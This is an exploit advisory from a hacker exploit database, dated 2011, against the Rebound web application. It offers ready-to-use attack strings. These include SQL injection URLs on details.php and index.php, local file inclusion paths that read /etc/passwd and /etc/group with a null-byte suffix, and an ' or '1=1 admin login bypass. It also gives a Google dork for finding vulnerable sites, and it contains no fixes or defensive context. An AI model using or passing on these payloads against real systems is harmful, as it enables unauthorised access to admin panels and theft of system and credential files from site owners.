Rebound suffers from local file inclusion and remote SQL injection vulnerabilities. A SQL injection vulnerability allows for authentication bypass.
a377c01037681e98ab7ab6d62067f5e635f5febc66e5a4c5bb90efaf05725b17
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm kalashinkov3 member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Info================================================================
[-] Title : Rebound (SQLi, LFi & bypass) Multipe Vulnerability
[-] Author: Kalashinkov3
[-] Home : 13000 / ALGERIA
[-] Website : 1337day.com / dis9.com
[-] Vendor: www.rebound.com.hk
[-] Email : kalashinkov3[at]Hotmail[dot]Fr
[-] Date : 29/07/2011
[-] Google Dork : intext:"Designed by Rebound"
[-] Category : webapps / 0day
[-] Special Thanks : KedAns-Dz, Caddy-Dz, KnocKout, Rizky Ariestiyansyah
[+] Exploit===============================================================
[-] SQL-i
# http://[localhost]/details.php?id='1
# http://[localhost]/details.php?id=[SQLi]
# http://[localhost]/index.php?cat_id='1
# http://[localhost]/index.php?cat_id=[SQLi]
[-] LFI
# http://[localhost]/page.php?page=../../../../../etc/group
# http://[localhost]/?page=../../../../../../../../etc/passwd%00
[-] Auth bypass Admin
# http://[localhost]/admin
Usernmae : ' or '1=1
Password : ' or '1=1
^_^ G00d LUCK ALL :=)
[+] Greets===================================================================+
+
BrOx-dz, KedAns-Dz, Caddy-Dz, KnocKout, toxic-kim, Rizky Ariestiyansyah, +
Keinji1258, 1337day.com, packetstormsecurity.org, Exploit-id.com +
andhrahackers.com, 1337day.com/team, id-backtrack.com, dis9.com/team +
all Algerians Hacker'S ;), All My Friends +
<3 I Love You Lila <3 +
+
=============================================================================+